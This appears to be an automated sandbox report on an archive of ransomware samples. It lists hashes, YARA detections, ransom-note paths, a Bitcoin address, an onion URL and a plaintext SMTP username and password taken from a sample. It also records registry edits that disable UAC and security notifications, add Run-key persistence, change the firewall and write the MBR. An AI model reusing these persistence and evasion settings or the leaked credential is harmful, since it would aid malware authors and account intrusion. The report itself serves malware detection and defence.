Analysis
-
max time kernel
219s -
max time network
245s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28-10-2024 16:27
Static task
static1
Behavioral task
behavioral1
Sample
RNSM00417.7z
Resource
win10v2004-20241007-en
General
-
Target
RNSM00417.7z
-
Size
26.6MB
-
MD5
3827bb44108eb019f3d69ec7c9a4c85b
-
SHA1
3cc6563e65ff0618cee4bcbb8637db128af32c0a
-
SHA256
0c05113830f590ea0e628c188bf2b0d9554c6e6bb3bb80178b193caf5bb41c96
-
SHA512
2e575b82c5f1d25233f5ef8ec2042a54a0b21127e73bea1720e8189f57d709879be7c693456217c8d65bc55ba89e51370c3f3fe603fbd3ff07e247c8da5e6caa
-
SSDEEP
786432:bFe9AF5zQqfplDfrIxRMmGBN63q8bv5ceUPt/q:bFVpjlDfrIxRMzw3lme
Malware Config
Extracted
Protocol: smtp- Host:
smtp.gmail.com - Port:
587 - Username:
[email protected] - Password:
Lolhacker05@!!
Extracted
C:\Users\Admin\Documents\__READ_ME_TO_RECOVER_YOUR_FILES.txt
3QtbAioBSw249J5xsGd1sCqTqhdDX4CD9L
Extracted
C:\Users\Public\WERE_MY _FILES.txt
globeimposter
httpps://www.torproject.org/
http://helpqvrg3cc5mvb3.onion/
Extracted
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\How To Decrypt Files.hta
class='mark'>[email protected]</span></div></li></ul></div><div
class='mark'>[email protected]</span></li><li>The
Signatures
-
Detect MafiaWare666 ransomware 2 IoCs
resource yara_rule behavioral1/files/0x0007000000023ca2-91.dat family_mafiaware666 behavioral1/memory/1096-102-0x00000000008C0000-0x00000000008E4000-memory.dmp family_mafiaware666 -
GlobeImposter
GlobeImposter is a ransomware first seen in 2017.
-
Globeimposter family
-
Locky
Ransomware strain released in 2016, with advanced features like anti-analysis.
-
Locky family
-
MafiaWare666 Ransomware
MafiaWare666 is ransomware written in C# with multiple variants.
-
Mafiaware666 family
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,\"C:\\Users\\Admin\\Desktop\\00417\\HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe\"" HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "3" Setup-Siemens.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "3" Setup-Siemens.exe -
Modiloader family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Setup-Siemens.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Setup-Siemens.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" Setup-Siemens.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "1" Setup-Siemens.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify = "1" Setup-Siemens.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Trojan-Ransom.Win32.Blocker.mvjg-586cb47c31583a8cd32e6797016106dfbdc0b56554fc4b66d17528580a086835.exe -
ModiLoader First Stage 1 IoCs
resource yara_rule behavioral1/memory/3492-800-0x00000000007E0000-0x00000000007FA000-memory.dmp modiloader_stage1 -
Renames multiple (1663) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Renames multiple (9162) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Blocklisted process makes network request 8 IoCs
flow pid Process 225 3604 mshta.exe 226 3604 mshta.exe 229 3604 mshta.exe 231 3604 mshta.exe 233 3604 mshta.exe 236 3604 mshta.exe 237 3604 mshta.exe 239 3604 mshta.exe -
Disables Task Manager via registry modification
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\rteth.sys cmd.exe -
Modifies Windows Firewall 2 TTPs 13 IoCs
pid Process 8148 netsh.exe 8140 netsh.exe 6892 netsh.exe 7052 netsh.exe 7004 netsh.exe 5056 netsh.exe 7376 netsh.exe 7388 netsh.exe 8088 netsh.exe 6628 netsh.exe 8132 netsh.exe 6160 netsh.exe 5196 netsh.exe -
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll" Setup-Siemens.exe -
Allows Network login with blank passwords 1 TTPs 2 IoCs
Allows local user accounts with blank passwords to access device from the network.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\LimitBlankPasswordUse = "0" Setup-Siemens.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\LimitBlankPasswordUse = "0" svcmain.exe -
Checks computer location settings 2 TTPs 12 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Encoder.led-95c6cb345c9e45e2a898ea92458edda33c0c685bc92602f004756ccc0c984f44.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation TunnelBear_Installer.sfx.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.MSIL.Blocker.gen-c83f6f4d1ab5f7d04cff339f90501abdbce3736476d747fb77dc2c9332c5ed39.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.MSIL.Makop.gen-5027107312399d069da14d080c632352db49ba011ff800c0fe0f535b4342b9c0.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Encoder.ldj-f39fde065966b6ba2baa74c589b9543b623639bebe2c444057d9a85bd4c7fa5f.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation TunnelBear_Installer.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.MSIL.Makop.gen-5027107312399d069da14d080c632352db49ba011ff800c0fe0f535b4342b9c0.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Blocker.mexm-ce45c43092d500d0aa3a23aa20faacebbc45ee13a99f48efaca6d80c1528e5b2.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation 123.exe -
Drops startup file 6 IoCs
description ioc Process File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\xinof.exe taskmgr.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe attrib.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe cmd.exe -
Executes dropped EXE 36 IoCs
pid Process 2460 HEUR-Trojan-Ransom.MSIL.Blocker.gen-c83f6f4d1ab5f7d04cff339f90501abdbce3736476d747fb77dc2c9332c5ed39.exe 1096 HEUR-Trojan-Ransom.MSIL.Crypren.gen-3ccc016464e41de7be959c3b00bda1296eee1c50a2897e05c1abbc9034b23027.exe 3304 HEUR-Trojan-Ransom.MSIL.Makop.gen-5027107312399d069da14d080c632352db49ba011ff800c0fe0f535b4342b9c0.exe 4712 HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe 3492 HEUR-Trojan-Ransom.Win32.Blocker.gen-977f77728f1783062f8c072096f0b7535ec74f686c3e40db5dc78766edabffeb.exe 4168 HEUR-Trojan-Ransom.Win32.DoppelPaymer.vho-8971ac708df78f14e3f21c7094d80616195eb46f912cf6d4e72d5eebf9fac865.exe 2384 HEUR-Trojan-Ransom.Win32.Encoder.gen-57cc7951edcd2b8d3836e7f700955a9ba490bd416a481b9c86c036a55d256954.exe 1272 HEUR-Trojan-Ransom.Win32.Encoder.vho-bd136b3fde933505cf3740c3800a5007e3a94a2d31f28416b04c212dcb0669b6.exe 3388 HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe 692 HEUR-Trojan-Ransom.Win32.Locky.gen-70320b438e8e14c531d6a889ef743ffe47c3d71e088316ff7b18269b6ed7ce81.exe 1736 Trojan-Ransom.Win32.Blocker.mexm-ce45c43092d500d0aa3a23aa20faacebbc45ee13a99f48efaca6d80c1528e5b2.exe 116 Trojan-Ransom.Win32.Encoder.ldj-f39fde065966b6ba2baa74c589b9543b623639bebe2c444057d9a85bd4c7fa5f.exe 1944 Trojan-Ransom.Win32.Encoder.led-95c6cb345c9e45e2a898ea92458edda33c0c685bc92602f004756ccc0c984f44.exe 3184 Trojan-Ransom.Win32.Gen.zlq-6968672454eb2109222c6461c218a6152e51a606b15cc9133e014718c99b8949.exe 2572 Trojan-Ransom.Win32.Blocker.mvjg-586cb47c31583a8cd32e6797016106dfbdc0b56554fc4b66d17528580a086835.exe 2556 Trojan-Ransom.Win32.Crypren.ahjz-4ebfdf556994b367b8a5f53c8a2caa968a4b04c1c36ce3f0ba4490db8d5b17cb.exe 2456 Trojan-Ransom.Win32.Gen.znw-184a6995706e71b75a539af48cb11c75a73dd33fed1793cc2cb4696ca46b96cc.exe 2392 123.exe 3856 UDS-Trojan-Ransom.Win32.Encoder-37942f7c03a7895189861f7dede0844b359baa7aab0651ac0f2700b0d576a678.exe 4432 UDS-Trojan-Ransom.Win32.Gen.vyw-78853ae45dc992cf465f9d101db3649311bbd1d11d60d63d12d5cdf1794c734a.exe 5188 TunnelBear_Installer.sfx.exe 5288 UDS-Trojan-Ransom.Win32.Locky-6ef270bce6969e01839651ba78e2f9dbfbbfebce95478497e07e9386214b977d.exe 5444 TunnelBear_Installer.exe 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe 5584 Setup-Siemens.exe 6264 svcmain.exe 1992 svchost.exe 7412 HostSystem.exe 7696 HostSystem.exe 3532 1.exe 7364 2.exe 6784 HEUR-Trojan-Ransom.MSIL.Makop.gen-5027107312399d069da14d080c632352db49ba011ff800c0fe0f535b4342b9c0.exe 7376 HEUR-Trojan-Ransom.MSIL.Makop.gen-5027107312399d069da14d080c632352db49ba011ff800c0fe0f535b4342b9c0.exe 6856 TORBUILD.exe 3320 TORBUILD.exe 5804 TORBUILD.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine Trojan-Ransom.Win32.Blocker.mvjg-586cb47c31583a8cd32e6797016106dfbdc0b56554fc4b66d17528580a086835.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe -
Loads dropped DLL 21 IoCs
pid Process 6856 TORBUILD.exe 6856 TORBUILD.exe 6856 TORBUILD.exe 6856 TORBUILD.exe 6856 TORBUILD.exe 6856 TORBUILD.exe 6856 TORBUILD.exe 3320 TORBUILD.exe 3320 TORBUILD.exe 3320 TORBUILD.exe 3320 TORBUILD.exe 3320 TORBUILD.exe 3320 TORBUILD.exe 3320 TORBUILD.exe 5804 TORBUILD.exe 5804 TORBUILD.exe 5804 TORBUILD.exe 5804 TORBUILD.exe 5804 TORBUILD.exe 5804 TORBUILD.exe 5804 TORBUILD.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 7604 icacls.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify = "1" Setup-Siemens.exe -
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Michael Gillespie = "C:\\ProgramData\\XINOF.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Michael Gillespie = "C:\\ProgramData\\XINOF.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Michael Gillespie = "C:\\ProgramData\\XINOF.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Public-Desktop = "C:\\Users\\Admin\\AppData\\Local\\HostSystem.exe -boot" HostSystem.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\<Unknown> = "C:\\Users\\Admin\\Desktop\\00417\\HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe" HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe = "C:\\Users\\Admin\\Desktop\\00417\\HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe" HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\BrowserUpdateCheck = "C:\\Users\\Admin\\AppData\\Local\\aspnet_wp.exe" aspnet_wp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Michael Gillespie = "C:\\ProgramData\\XINOF.exe" reg.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Setup-Siemens.exe -
Drops desktop.ini file(s) 31 IoCs
description ioc Process File opened for modification C:\Users\Public\Videos\desktop.ini aspnet_wp.exe File opened for modification C:\Users\Public\Downloads\desktop.ini aspnet_wp.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini aspnet_wp.exe File opened for modification C:\Users\Admin\Videos\desktop.ini aspnet_wp.exe File opened for modification C:\Users\Admin\Documents\desktop.ini aspnet_wp.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini HEUR-Trojan-Ransom.MSIL.Crypren.gen-3ccc016464e41de7be959c3b00bda1296eee1c50a2897e05c1abbc9034b23027.exe File opened for modification C:\Users\Public\Documents\desktop.ini aspnet_wp.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini aspnet_wp.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini aspnet_wp.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini aspnet_wp.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini aspnet_wp.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini aspnet_wp.exe File opened for modification C:\Users\Public\Pictures\desktop.ini aspnet_wp.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini aspnet_wp.exe File opened for modification C:\$Recycle.Bin\S-1-5-21-4050598569-1597076380-177084960-1000\desktop.ini aspnet_wp.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini HEUR-Trojan-Ransom.MSIL.Crypren.gen-3ccc016464e41de7be959c3b00bda1296eee1c50a2897e05c1abbc9034b23027.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini aspnet_wp.exe File opened for modification C:\Users\Public\desktop.ini aspnet_wp.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini aspnet_wp.exe File opened for modification C:\Users\Admin\Searches\desktop.ini aspnet_wp.exe File opened for modification C:\Users\Public\Desktop\desktop.ini aspnet_wp.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI aspnet_wp.exe File opened for modification C:\Users\Public\Libraries\desktop.ini aspnet_wp.exe File opened for modification C:\Users\Public\Music\desktop.ini aspnet_wp.exe File opened for modification C:\Users\Admin\Links\desktop.ini aspnet_wp.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini aspnet_wp.exe File opened for modification C:\Program Files (x86)\desktop.ini aspnet_wp.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-4050598569-1597076380-177084960-1000\desktop.ini aspnet_wp.exe File opened for modification C:\Users\Admin\Music\desktop.ini aspnet_wp.exe File opened for modification C:\Program Files\desktop.ini aspnet_wp.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini aspnet_wp.exe -
Enumerates connected drives 3 TTPs 54 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\h: cmd.exe File opened (read-only) \??\k: cmd.exe File opened (read-only) \??\t: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\w: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\B: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\S: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\u: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\x: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\L: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\y: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\j: cmd.exe File opened (read-only) \??\m: cmd.exe File opened (read-only) \??\j: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\q: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\K: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\W: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\e: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\U: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\l: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\Z: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\e: cmd.exe File opened (read-only) \??\k: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\o: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\N: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\A: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\n: cmd.exe File opened (read-only) \??\o: cmd.exe File opened (read-only) \??\v: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\M: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\T: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\i: cmd.exe File opened (read-only) \??\l: cmd.exe File opened (read-only) \??\i: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\m: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\s: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\P: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\g: cmd.exe File opened (read-only) \??\g: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\h: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\n: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\p: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\R: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\z: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\E: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\H: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\O: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\I: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\Q: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\Y: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\r: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\G: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\J: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\X: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened (read-only) \??\V: HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe -
Hijack Execution Flow: Executable Installer File Permissions Weakness 1 TTPs 1 IoCs
Possible Turn off User Account Control's privilege elevation for standard users.
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0" Setup-Siemens.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
flow ioc 114 discord.com -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 168 ip-api.com 206 myexternalip.com 207 myexternalip.com 215 myexternalip.com -
Modifies WinLogon 2 TTPs 5 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCScan = "0" Setup-Siemens.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" Setup-Siemens.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" svcmain.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\False = "1" Setup-Siemens.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCDisable = "4294967197" Setup-Siemens.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
